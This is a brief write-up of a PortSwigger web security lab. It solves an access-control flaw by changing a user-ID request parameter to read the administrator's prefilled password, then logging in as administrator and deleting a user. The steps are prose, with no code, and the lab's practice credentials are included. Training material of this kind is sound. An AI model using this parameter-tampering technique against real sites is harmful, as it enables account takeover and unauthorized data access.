User ID controlled by request parameter with password disclosure

https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter-with-password-disclosure

Description

This lab has user account page that contains the current user's existing password, prefilled in a masked input.

To solve the lab, retrieve the administrator's password, then use it to delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter

Solution

we can start login as wiener user

Checking this request we can see that this page has as the username 'wiener' as id parameter

and in the response there's a cleartext password!

So, trying to change the id with 'admnistrator' we're able to disclosure administrator's password:

Now we can login as administrator, access to Admin panel and delte 'Carlos' user completing the lab!

Last updated